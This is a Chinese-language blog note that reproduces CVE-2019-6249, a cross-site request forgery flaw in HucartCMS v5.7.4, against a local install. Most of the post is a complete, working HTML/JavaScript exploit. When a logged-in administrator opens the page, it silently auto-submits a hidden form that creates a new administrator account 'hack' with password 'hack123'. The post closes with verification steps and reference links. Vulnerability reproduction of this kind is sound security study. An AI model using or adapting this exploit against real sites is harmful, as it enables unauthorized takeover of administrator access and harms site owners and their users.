CVE-2019-6249 HucartCMS CSRF漏洞復現

• 2019 年 10 月 7 日
• 筆記

近日，Hucart cms v5.7.4版本存在一個CSRF漏洞，當管理員登陸後訪問CSRF測試頁面，可導致增加一個名為hack的管理員帳號。漏洞編號是CVE-2019-6249.

從網上下載源碼本地安裝即可。本地創建一個html文件，保存如下exp程式碼：

<html><body>  <script type="text/javascript">  function post(url,fields)  {  var p = document.createElement("form");  p.action = url;  p.innerHTML = fields;  p.target = "_self";  p.method = "post";  document.body.appendChild(p);  p.submit();  }  function csrf_hack()  {  var fields;    fields += "<input type='hidden' name='adm_user' value='hack' />";  fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  fields += "<input type='hidden' name='adm_mobile' value='12345678901' />";  fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  fields += "<input type='hidden' name='adm_enabled' value='1' />";  fields += "<input type='hidden' name='act_type' value='add' />";  fields += "<input type='hidden' name='adm_id' value='' />";    var url = "http://localhost/hucart/adminsys/index.php?load=admins&act=edit_info&act_type=add";  post(url,fields);  }  window.onload = function() { csrf_hack();}  </script>  </body></html>

首先以管理員身份登錄站點後台，然後訪exp程式碼頁面,即可添加一個hack/hack123賬戶資訊,訪問即可：

查看資料庫後台的hc_admins表能夠發現賬戶資訊已經被添加！

源碼下載：

http://down.chinaz.com/soft/35067.htm#down

參考資訊：

https://www.exploit-db.com/exploits/46149

https://github.com/NMTech0x90/CVE-2019-6249_Hucart-cms